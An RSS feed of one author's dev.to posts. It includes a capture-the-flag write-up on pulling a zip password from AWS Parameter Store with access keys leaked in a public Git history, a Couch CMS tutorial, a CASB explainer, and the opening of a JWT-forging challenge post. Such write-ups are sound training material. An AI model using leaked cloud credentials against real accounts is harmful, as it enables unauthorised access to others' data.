<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Antoinette Maria</title>
    <description>The latest articles on DEV Community by Antoinette Maria (@antoinette0x53).</description>
    <link>https://dev.to/antoinette0x53</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F13357%2F6e9c668c-8878-4435-b1e0-4d7b116a2876.jpg</url>
      <title>DEV Community: Antoinette Maria</title>
      <link>https://dev.to/antoinette0x53</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/antoinette0x53"/>
    <language>en</language>
    <item>
      <title>AWS and Messy Git Practices: SecDSM March MiniCTF Solution</title>
      <dc:creator>Antoinette Maria</dc:creator>
      <pubDate>Fri, 16 Mar 2018 04:02:07 +0000</pubDate>
      <link>https://dev.to/antoinette0x53/aws-and-messy-git-practices-secdsm-march-minictf-solution--1ngh</link>
      <guid>https://dev.to/antoinette0x53/aws-and-messy-git-practices-secdsm-march-minictf-solution--1ngh</guid>
      <description>&lt;p&gt;&lt;em&gt;&lt;a href="https://antoinettestevens.com/secdsm-march-minictf-solution/" rel="noopener noreferrer"&gt;Originally posted on antoinettestevens.com&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I finally made it back to SecDSM after missing a month. I don't have a solution for February's MiniCTF, but it involved machine learning, CAPTCHA brute-forcing, and scripting. Unfortunately, I was busy preparing for a large event that I planned on March 1 and didn't have time to obsess over this challenge, even though I found it really interesting. &lt;/p&gt;

&lt;p&gt;The &lt;a href="https://ctf.secdsm.org/march_gotcha/" rel="noopener noreferrer"&gt;March SecDSM MiniCTF&lt;/a&gt; was a lot of fun, and I learned about the AWS CLI and the importance of making sure you're using the most up-to-date version of a tool. Let's take a look together. I'll try my best to walk through this and explain the thought patterns that I had as I went along. I should preface this by saying that I have never worked with AWS before. I've only read about it and seen a talk once at a security conference.&lt;/p&gt;

&lt;h1&gt;
  
  
  Recon
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fi.imgur.com%2F1RGgd5u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fi.imgur.com%2F1RGgd5u.png" alt="challenge"&gt;&lt;/a&gt;&lt;br&gt;
Visiting http[s]://portfolio[.]xbcw[.]net shows a fairly innocuous website. There aren't any fields to input text, so I immediately ruled out about half of the web exploits that I know of, mostly injections. The only thing to do is begin browsing around the site. I use the Chrome browser, so I tend to browse with 'Inspect' open to look at files and network connections. I tried to see if there's a robots.txt and got an error in the form of an XML file. That seemed weird to me, since I usually just get a normal 404 page if a page doesn't exist. Moving on, I noticed that the icons at the top are for LinkedIn (doesn't go anywhere), a GitHub repo, and a link to a PDF resume. I looked at the PDF and didn't see anything particularly special. I decided to begin inspecting the GitHub repo because I figured I'd be able to find out more about the deployed code, if nothing else. &lt;/p&gt;

&lt;p&gt;The README for the repo is uninteresting, so I started clicking through files without really knowing what I was looking for or where to start. After a few minutes, I decided to go through the commits. I can't fully rationalize why, other than saying that I figured it would be helpful to know what the repo owner changed or removed just in case it gave me a hint about what I should look for on the website. At this point, I still don't know it's AWS. &lt;/p&gt;

&lt;p&gt;Going through the commits on the repo, the dots start to connect as I realize there are some very interesting things hidden in the commit history for this project.&lt;/p&gt;

&lt;p&gt;The first thing I found was this:&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fi.imgur.com%2FPVtf9b5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fi.imgur.com%2FPVtf9b5.png"&gt;&lt;/a&gt;&lt;br&gt;
Now, I didn't know what it meant, but the word 'bucket' is how I knew we were dealing with AWS. In the future I'll probably be able to recognize it faster but, in that moment, that's what did it. ¯\_(ツ)_/¯&lt;/p&gt;

&lt;p&gt;I hear about Amazon S3 Buckets being improperly configured and vulnerable all of the time. It's a popular topic among developers, so I knew this would probably be something like that. Whenever I feel like I have a pretty strong grasp on my goal, my next step is always to Google it. That resulted in me finding an article from Rhino Security Labs, &lt;a href="https://rhinosecuritylabs.com/penetration-testing/penetration-testing-aws-storage/" rel="noopener noreferrer"&gt;Penetration Testing AWS Storage: Kicking the S3 Bucket&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;I browsed to the S3 URL and found an XML listing of all the content in this bucket, including a file called secrets.zip. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fi.imgur.com%2FLrw9lGb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fi.imgur.com%2FLrw9lGb.png" alt="s3 bucket addr"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fi.imgur.com%2FQQmN8z4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fi.imgur.com%2FQQmN8z4.png"&gt;&lt;/a&gt;&lt;br&gt;
And now I'm like...&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fi.imgur.com%2FitMcsy5.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fi.imgur.com%2FitMcsy5.gif"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I do a wget on that zip file (you need pzip) and find out that it is password protected. A &lt;code&gt;strings&lt;/code&gt; on the zip will reveal that there is a file called secrets.txt, but nothing resembling a password here. This is where things get rocky for me.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Random observations from recon:&lt;/strong&gt; &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Somewhere in this process I tried Wireshark. It wasn't until I was filtering on the IP address that I remembered it was useless, because the site is HTTPS and the traffic is encrypted. &lt;/li&gt;
&lt;li&gt;While looking at the code, I noticed that the images used on the webpage were named things like "gotcha", just in case people thought the images were a &lt;a href="https://en.wikipedia.org/wiki/Steganography" rel="noopener noreferrer"&gt;steg&lt;/a&gt; challenge, I'm assuming.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;h1&gt;
  
  
  The Exploit(?)
&lt;/h1&gt;

&lt;p&gt;A lot of people's first instinct when faced with a password prompt is to brute force it. In all of the CTFs I've seen (not that many, really), if the organizers want you to brute force they will usually do one of two things: either provide you with a wordlist (or hide one somewhere for you to find) or make some type of pun about a popular wordlist. Otherwise, brute forcing usually isn't the answer. Check out &lt;a href="https://www.betterbuys.com/estimating-password-cracking-times/" rel="noopener noreferrer"&gt;this article from Better Buys&lt;/a&gt; to learn about the time it takes to blindly brute force a password. &lt;/p&gt;

&lt;p&gt;Looking back at the commit I found for lambda-upload-portfolio.py, there's a comment that mentions that the password "will be in the parameter store under the filename". I had NO CLUE what that meant, so I Googled again and eventually found an &lt;a href="https://medium.com/@mda590/simple-secrets-management-via-aws-ec2-parameter-store-737477e19450" rel="noopener noreferrer"&gt;article on Medium explaining how to access the parameter store&lt;/a&gt;. It's exactly what I needed. I go to the AWS CLI (installed somewhere in this process with apt-get) and get an error saying I have to run &lt;code&gt;aws configure&lt;/code&gt; first. The &lt;code&gt;aws configure&lt;/code&gt; command requires me to know the access key ID and secret access key for the AWS account that owns the S3 bucket. &lt;em&gt;Well Shit&lt;/em&gt;. I don't know that or how to find it. After minutes of banging my head against the wall, I go back to looking around the Git commits, thinking maybe I missed something. And then... &lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fi.imgur.com%2Fy8pTJl8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fi.imgur.com%2Fy8pTJl8.png"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And this is why you should always be very careful when committing to a public repository. Oh well. Now I can configure the AWS CLI and do what I need to do. I follow the instructions from the Medium blog and run into a problem: &lt;code&gt;get-parameters&lt;/code&gt; is missing. It doesn't exist. I figure that I must be doing something wrong and try other things with no luck. Eventually someone else gets the flag before I do, and they mention that they used &lt;code&gt;get-parameters&lt;/code&gt;. &lt;br&gt;
&lt;a href="https://i.giphy.com/media/l3q2K5jinAlChoCLS/giphy.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://i.giphy.com/media/l3q2K5jinAlChoCLS/giphy.gif"&gt;&lt;/a&gt;&lt;br&gt;
I run &lt;code&gt;aws --version&lt;/code&gt; and sure enough I'm not using the most up-to-date version; the version I'm using doesn't have the &lt;code&gt;get-parameters&lt;/code&gt; command (and other commands) yet. When I got home I uninstalled awscli completely, updated my repos, added the repo suggested by the awscli documentation, and reinstalled awscli. I could finally see the &lt;code&gt;get-parameters&lt;/code&gt; command.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;antoinette@dev:~/secdsm/march$ aws ssm get-parameters --names secrets.zip
{
    "InvalidParameters": [], 
    "Parameters": [
        {
            "Version": 1, 
            "Type": "String", 
            "Name": "secrets.zip", 
            "Value": "Dodongo Dislikes Smoke"
        }
    ]
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;While reading about Parameter Store, I learned that it stores values as key:value pairs. I passed 'secrets.zip' to the &lt;code&gt;--names&lt;/code&gt; flag because the comment in the Python script said the password was stored under the filename, meaning that in the key:value pair the filename is the key and the password is the value. &lt;/p&gt;

&lt;p&gt;Finally, I pasted the password, unzipped the file, and printed out the contents of secrets.txt.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;antoinette@dev:~/secdsm/march$ cat secrets.txt 
flag{iTsAsecReTtoEverYBodY}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Moral of the story: Make sure your programs are the latest version so that you don't get screwed. &lt;/p&gt;

&lt;p&gt;Oh well. You win some. You lose some. Hope you found this helpful! Leave your questions and comments below. &lt;/p&gt;

</description>
      <category>security</category>
      <category>aws</category>
    </item>
    <item>
      <title>Why The F**k Won't You Answer My Email?</title>
      <dc:creator>Antoinette Maria</dc:creator>
      <pubDate>Wed, 06 Dec 2017 16:20:22 +0000</pubDate>
      <link>https://dev.to/antoinette0x53/why-the-fk-wont-you-answer-my-email-83a</link>
      <guid>https://dev.to/antoinette0x53/why-the-fk-wont-you-answer-my-email-83a</guid>
      <description>&lt;p&gt;I'm currently on a project to POC a product from a bunch of different vendors. These products require integration with tools that my team doesn't manage which means (you guessed it!) I have to talk to and work with people from different teams. We are on fairly strict timelines with these products due to licensing and milestones set by the project team, so I need to get things integrated as soon as possible so that I can get the products working and do my analysis on their performance. &lt;/p&gt;

&lt;p&gt;This brings me to an unnamed employee that we'll call "Alex", because that is a gender neutral name. Alex is the contact I was given on a team that manages a piece of software we need these products to monitor for the POC. However, Alex won't answer my emails asking about getting the integration set up. I've sent a follow-up email every day for the past 3 days, and on the last email I cc'd our project manager and my leader. I'm beyond frustrated at this point, because this isn't the first time Alex has done this. I've had to reach out to this person before for help with their software and they never responded then either. That previous issue was less of a priority and I didn't feel the need to follow up, but now it just seems ridiculous. &lt;/p&gt;

&lt;p&gt;&lt;em&gt;Update! Alex finally answered me after the email that cc'd my leader and PM&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;For those of you who have been in my situation, what did you do? How did you get an unresponsive person (who might be blocking your project) to respond to your emails?&lt;/p&gt;

</description>
      <category>career</category>
    </item>
    <item>
      <title>Couch CMS and the lazy developer</title>
      <dc:creator>Antoinette Maria</dc:creator>
      <pubDate>Thu, 21 Sep 2017 00:01:35 +0000</pubDate>
      <link>https://dev.to/antoinette0x53/couch-cms-and-the-lazy-developer</link>
      <guid>https://dev.to/antoinette0x53/couch-cms-and-the-lazy-developer</guid>
      <description>&lt;p&gt;I do not claim to be a developer, not a good one at least. In fact, I think it would almost insult other developers to call myself one. My only in-depth development experience, aside from writing some smaller tools for work, is as web developer for a start up in college. I worked with Wordpress (written in PHP) and later with Magento and coding with Liquid. I was okay with it but it taught me how tedious working with a CMS can be. Now, I run Reboot Iowa, a non-profit I founded to teach basic computer programming concepts and encourage technical literacy. We designed and built our own website and it looks great (with the exception of a few edits that need to happen on the Donate page, hey...I'm honest about it). The downside is that it is completely static which is not helpful for loading information about upcoming workshops and events dynamically. It's also a pain to update anything, which happens pretty often when you're a budding organization of any kind. &lt;/p&gt;

&lt;h2&gt;
  
  
  Enter Couch CMS
&lt;/h2&gt;

&lt;p&gt;I spent a few days Googling some solutions for a lightweight CMS. I really didn't want to have to write a Wordpress theme or start all over with a new website while integrating a CMS. And it isn't because I don't think I can do it, but I'm pretty lazy. As I said before, I don't consider myself a developer and so it takes me longer than necessary to figure out everything and I just don't want to spend the time. Enter Couch CMS, a CMS for lazy people like me. Easy to set up and use and even comes with an admin panel. Prayers answered. Now, don't get me wrong. I can see how this tool would be totally useful for non-technical people with a need and being non-technical doesn't make them lazy. I'm calling myself lazy because I have the technical skill and knowledge to master a more robust CMS or even use a framework to build my own and simply choose not to. &lt;/p&gt;

&lt;p&gt;I used MAMP to set up a local dev environment on my laptop to test out Couch. Couch CMS is written in PHP, a requirement I had for any solution I ended up using because it's the web language I'm most comfortable with. PHP was the first web language I learned, so it's close to second nature now. &lt;/p&gt;

&lt;p&gt;I really liked that I could easily plug dynamic pieces into a static site. All I had to do was require a file from the Couch directory (couch.php) and invoke it at the end of the file. I eventually used it to easily update the bios for myself and my board members and to update various fields such as our 'About Us', 'Vision and Mission', and various other texts that might change in the future. My favorite part was being able to have upcoming events appear on the site and disappear after the date of the event passed. Now Couch is running on our production &lt;a href="//rebootiowa.org"&gt;Reboot Iowa website&lt;/a&gt; and it's working out well so far. I still need to add in the necessary code to make our Announcements and News dynamic, but..well... I'm lazy remember?&lt;/p&gt;

&lt;h2&gt;
  
  
  A Little Taste
&lt;/h2&gt;

&lt;p&gt;Here's a sample of how I added a dynamic events section to the homepage of Reboot Iowa's website.&lt;/p&gt;

&lt;p&gt;I began by defining a template for an event in a file called events.php. With this template, an event object appears in the admin panel.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// events.php
&amp;lt;?php require_once( 'couch/cms.php' ); ?&amp;gt; 
&amp;lt;cms:template title='Event' clonable='1' &amp;gt; 
    &amp;lt;cms:editable name='event_description' type='richtext' /&amp;gt;
    &amp;lt;cms:editable name='event_image'
        crop='1'
        width='610'
        height='150'
        type='image'
    /&amp;gt;
    &amp;lt;cms:editable name='location' label='Location' type='text' /&amp;gt;
    &amp;lt;cms:editable name="event_link" label='Event Sign Up Link' type='text'/&amp;gt;

    &amp;lt;cms:editable name="start_time" label="Time From (24 Hrs)"
      opt_values=' Unspecified |
                  00:00 | 00:30 | 01:00 | 01:30 | 02:00 | 02:30 | 03:00 | 03:30 |
                  04:00 | 04:30 | 05:00 | 05:30 | 06:00 | 06:30 | 07:00 | 07:30 |
                  08:00 | 08:30 | 09:00 | 09:30 | 10:00 | 10:30 | 11:00 | 11:30 |
                  12:00 | 12:30 | 13:00 | 13:30 | 14:00 | 14:30 | 15:00 | 15:30 |
                  16:00 | 16:30 | 17:00 | 17:30 | 18:00 | 18:30 | 19:00 | 19:30 |
                  20:00 | 20:30 | 21:00 | 21:30 | 22:00 | 22:30 | 23:00 | 23:30 |'
      type='dropdown'
    /&amp;gt;

    &amp;lt;cms:editable name="end_time" label="Time Until (24 Hrs)"
      opt_values=' Unspecified |
                  00:00 | 00:30 | 01:00 | 01:30 | 02:00 | 02:30 | 03:00 | 03:30 |
                  04:00 | 04:30 | 05:00 | 05:30 | 06:00 | 06:30 | 07:00 | 07:30 |
                  08:00 | 08:30 | 09:00 | 09:30 | 10:00 | 10:30 | 11:00 | 11:30 |
                  12:00 | 12:30 | 13:00 | 13:30 | 14:00 | 14:30 | 15:00 | 15:30 |
                  16:00 | 16:30 | 17:00 | 17:30 | 18:00 | 18:30 | 19:00 | 19:30 |
                  20:00 | 20:30 | 21:00 | 21:30 | 22:00 | 22:30 | 23:00 | 23:30 |'
      type='dropdown'
    /&amp;gt;

    &amp;lt;cms:editable name='end_date'
        label='Event End Date (if multi-days event)'
        desc='Enter date in yyyy-mm-dd format e.g. 2010-12-31'
        type='text'
        validator='regex=/(?:19|20)\d\d-(?:0[1-9]|1[012])-(?:0[1-9]|[12][0-9]|3[01])/'
        separator='#'
        validator_msg='regex=Incorrect date format'
    /&amp;gt;
&amp;lt;/cms:template&amp;gt;
&amp;lt;?php $title="Event"; include('header.php'); ?&amp;gt;
&amp;lt;div class="row" &amp;gt;
    &amp;lt;div class="col-sm-12" style="margin-top:35px;"&amp;gt;
        &amp;lt;h2 style="margin-left:10px;"&amp;gt;Upcoming Events&amp;lt;/h2&amp;gt;
        &amp;lt;div class="row"&amp;gt;

        &amp;lt;/div&amp;gt;&amp;lt;hr&amp;gt;
        &amp;lt;div class="row"&amp;gt;

        &amp;lt;/div&amp;gt;
    &amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;?php include('footer.php'); ?&amp;gt;
&amp;lt;?php COUCH::invoke(); ?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After creating the template and creating some events, I added the necessary code to the index file to display information about upcoming events.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// index.php
...
...
...
&amp;lt;h2 style="margin-left:10px;"&amp;gt;Announcements and Upcoming Events&amp;lt;/h2&amp;gt;
        &amp;lt;div class="row"&amp;gt;
            &amp;lt;div class="col-sm-3"&amp;gt;
                &amp;lt;p class="lead section-lead"&amp;gt;&amp;lt;i class="fa fa-calendar fa-2x" aria-hidden="true" style="padding:10px;"&amp;gt;&amp;lt;/i&amp;gt; &amp;lt;strong&amp;gt;Events &amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
            &amp;lt;/div&amp;gt;
            &amp;lt;div class="col-sm-9"&amp;gt;
                &amp;lt;cms:set today="&amp;lt;cms:date format='Y-m-d' /&amp;gt;" /&amp;gt;
                &amp;lt;cms:pages masterpage='events.php' orderby='end_date' order='asc'&amp;gt;
                &amp;lt;cms:if today lt end_date&amp;gt;
                  &amp;lt;p class="lead section-lead" style="/*margin-left:10px;*/"&amp;gt;&amp;lt;cms:show k_page_title /&amp;gt; | &amp;lt;cms:date end_date format='F j' /&amp;gt; &amp;lt;/p&amp;gt;

                  &amp;lt;p style="margin-left:10px;"&amp;gt;
                    &amp;lt;cms:show event_description /&amp;gt;

                      Time: &amp;lt;cms:date start_time format='g a' /&amp;gt;-&amp;lt;cms:date end_time format='g a'/&amp;gt;&amp;lt;br&amp;gt;
                      Location: &amp;lt;cms:show location /&amp;gt;
                      &amp;lt;cms:if event_link !='Unspecified'&amp;gt;
                        &amp;lt;br&amp;gt;&amp;lt;a target="_blank" href="&amp;lt;cms:show event_link /&amp;gt;"&amp;gt;Sign up Here&amp;lt;/a&amp;gt;
                      &amp;lt;/cms:if&amp;gt;
                  &amp;lt;/p&amp;gt;
                &amp;lt;/cms:if&amp;gt;
                &amp;lt;/cms:pages&amp;gt;
            &amp;lt;/div&amp;gt;
...
...
...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You'll notice I set a variable &lt;code&gt;today&lt;/code&gt;, done by using the &lt;code&gt;cms:set&lt;/code&gt; tag, to compare the event date with the current date in order to determine which events to show.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;                &amp;lt;cms:set today="&amp;lt;cms:date format='Y-m-d' /&amp;gt;" /&amp;gt;
                &amp;lt;cms:pages masterpage='events.php' orderby='end_date' order='asc'&amp;gt;
                &amp;lt;cms:if today lt end_date&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The many tags, such as &lt;code&gt;cms:set&lt;/code&gt; and &lt;code&gt;cms:if&lt;/code&gt;, give me a small range of flexibility when working with Couch to display information, which I really appreciate. &lt;/p&gt;

&lt;p&gt;Setup documentation can be found &lt;a href="http://docs.couchcms.com/tutorials/portfolio-site/building-a-real-world-site.html"&gt;here&lt;/a&gt;. In short, all you do is unzip a folder and place it in a directory. After updating the config file with the credentials for your SQL database, you navigate to the admin panel, complete installation, and you're good to go. I won't get into all of the details, but if you'd like to know more about CouchCMS, they have really good &lt;a href="http://docs.couchcms.com/"&gt;documentation&lt;/a&gt;. I used the documentation as a guide to figure out everything I needed. &lt;/p&gt;

&lt;p&gt;I'm more curious to know about other lightweight CMSs you guys have heard about or tricks you've picked up when running a dynamic site to make it a little easier to use. If you end up trying out Couch, let me know what you think. &lt;/p&gt;

</description>
      <category>cms</category>
      <category>webdev</category>
    </item>
    <item>
      <title>Monitoring The Cloud</title>
      <dc:creator>Antoinette Maria</dc:creator>
      <pubDate>Mon, 28 Aug 2017 20:50:14 +0000</pubDate>
      <link>https://dev.to/antoinette0x53/monitoring-the-cloud</link>
      <guid>https://dev.to/antoinette0x53/monitoring-the-cloud</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;I'm trying to get better about describing to non-security people what it is I do for work. So I'm going to start writing these little posts about different tools we use so that I can reference them later.&lt;/em&gt; &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Many companies, both small and large, are beginning to move towards cloud based solutions, such as Salesforce, Box, AWS, etc., to meet the different needs of the company. With the growth of cloud solutions as enterprise solutions, concerns surrounding the security of customer data have grown as well. Companies want to know what data is being stored in the cloud, who has access to that data, and what they can do with the data. This is where a CAS or CASB enters into the equation. A Cloud Access Security Broker is a fairly new technology that allows companies to monitor, alert on, and sometimes enforce policies in their cloud solutions. The main use cases surrounding CASBs are data loss prevention (DLP), shadow IT (the detection of cloud applications that have not been approved for use), and privilege abuse. &lt;/p&gt;

&lt;h2&gt;
  
  
  There are three different types of CASB solutions available: API-based, proxy-based, and hybrid.
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;API-Based Solutions&lt;/strong&gt;&lt;br&gt;
API based CASBs are out-of-band solutions that rely on pulling information via the APIs offered by the cloud vendor in use. For example, an API based CASB will pull logs from Salesforce using the Salesforce API. If the API doesn't capture a particular event, then it won't be visible to the CASB either. The advantages of the API based solution are that you don't have any network latency, there is low impact to end users, and you get visibility into IaaS and PaaS (rather than just SaaS). The disadvantage of API based solutions is the lack of real-time prevention. API based CASBs don't enable administrators to stop a transaction as it happens. It's strictly reactive.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Proxy-Based Solutions&lt;/strong&gt;&lt;br&gt;
A proxy based CASB uses a forward or reverse proxy to tunnel user traffic through the CASB solution for monitoring and alerting. This solution is really good for companies whose end users use managed devices. The problem with the proxy-based solution is that there can be significant network latency, and it only works for SaaS solutions. Proxy based solutions are also a central point of failure, creating an opportunity for high user impact should something go wrong. However, in contrast to the API based solution, proxy based CASB solutions give you the opportunity to enforce policy as the violation occurs. This can be invaluable for companies who use applications where data exfiltration is a big concern (e.g. Salesforce or OneDrive). &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hybrid&lt;/strong&gt;&lt;br&gt;
It's the best of both worlds. Some of the disadvantages still exist, but their impact is reduced with the advantage of having both solutions rolled into one. &lt;/p&gt;

&lt;h2&gt;
  
  
  A CASB isn't...
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;a replacement for a SIEM solution.&lt;/strong&gt;&lt;br&gt;
A CASB should not be looked at as a replacement for a SIEM. The features of a SIEM far outweigh anything the CASB is capable of in terms of monitoring logs. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;a replacement for a DLP solution.&lt;/strong&gt;&lt;br&gt;
Many companies turning to CASBs to monitor their cloud apps are doing so because they need to implement DLP for cloud. That, however, isn't a reason to forget about DLP outside of SaaS applications. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;a replacement for a proxy or web gateway.&lt;/strong&gt;&lt;br&gt;
A CASB isn't meant to proxy all end user traffic. It's only used to monitor the traffic for the cloud applications that need to be monitored.&lt;/p&gt;

&lt;p&gt;The CASB should be used in conjunction with, not in place of, all of these solutions. A CASB can provide logs (visibility) into cloud applications and assist existing DLP solutions. &lt;/p&gt;

&lt;p&gt;As I mentioned before, this is a fairly new space in the security world. Many solutions are still maturing and evolving. I believe that in the future most of the products offered in this space will be hybrid solutions, to better fit a larger share of the market. Either way, if your company has a large chunk of data being stored in the cloud, there's a good chance it will use a CASB to monitor that data in the near future. &lt;/p&gt;

</description>
      <category>security</category>
      <category>cloud</category>
    </item>
    <item>
      <title>Forging JSON Web Tokens To Win a Prize</title>
      <dc:creator>Antoinette Maria</dc:creator>
      <pubDate>Thu, 27 Jul 2017 03:02:51 +0000</pubDate>
      <link>https://dev.to/antoinette0x53/forging-json-web-tokens-to-win-a-prize</link>
      <guid>https://dev.to/antoinette0x53/forging-json-web-tokens-to-win-a-prize</guid>
      <description>&lt;p&gt;&lt;iframe class="tweet-embed" id="tweet-888164176404918278-702" src="https://platform.twitter.com/embed/Tweet.html?id=888164176404918278"&gt;
&lt;/iframe&gt;

  // Detect dark theme
  var iframe = document.getElementById('tweet-888164176404918278-702');
  if (document.body.className.includes('dark-theme')) {
    iframe.src = "https://platform.twitter.com/embed/Tweet.html?id=888164176404918278&amp;amp;theme=dark"
  }



&lt;/p&gt;

&lt;p&gt;I received a screenshot of the above tweet from my team's intern. We're planning to attend &lt;a href="http://www.securitybsides.com/w/page/113886499/BSidesAugusta%202017" rel="noopener noreferrer"&gt;BSides Augusta&lt;/a&gt; this year, so immediately everything got thrown to the side so that I could solve (what I thought would be) a quick and easy challenge. It was neither quick nor easy. So I'm going to walk you through the 2-hour process of trying to solve this challenge. I had some help, so that will be mixed in with my thoughts as well. &lt;/p&gt;

&lt;h2&gt;
  
  
  The Easy Part
&lt;/h2&gt;

&lt;p&gt;Looking at the string of text, it looks like hex. I threw it into a hex to ASCII converter online and got gibberish. I looked at the string for a minute and noticed that the first few bytes looked really familiar. &lt;code&gt;1f8b08&lt;/code&gt; is the file signature for a gzip file. Let the record show that I actually realized the first few bytes were special on my own. I used Google to verify, but I am proud of myself for even knowing that, since it wasn't knowledge that I actively knew I possessed. &lt;/p&gt;

&lt;p&gt;I put the hex into a hex editor (also found online) and downloaded the result as a gzip file. If you do a &lt;code&gt;zcat&lt;/code&gt; on the file, it prints out an IP address. &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;zcat&lt;/code&gt; is a handy command line tool to &lt;code&gt;cat&lt;/code&gt;, or print to the console, the contents of a gzip-compressed file without leaving a decompressed copy on disk.&lt;br&gt;
&lt;/p&gt;
&lt;/blockquote&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;~$ zcat test.gz
35.184.14.24
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  The Not-So-Easy Part
&lt;/h2&gt;

&lt;p&gt;Visiting that IP address leads to...&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2F5zgq99h0uv53pkb3ntcx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2F5zgq99h0uv53pkb3ntcx.png" alt="site image"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Right away I noticed that the site is running over port 80, a.k.a. no HTTPS. Also, due to the nature of what I'm doing (trying to hack something), I knew it was probably vulnerable in some way. If you try to brute-force it, you'll get a message saying that you can't do that. Below is what happens if you try to enter 'Admin' as the user and 'admin' as the password.&lt;/p&gt;

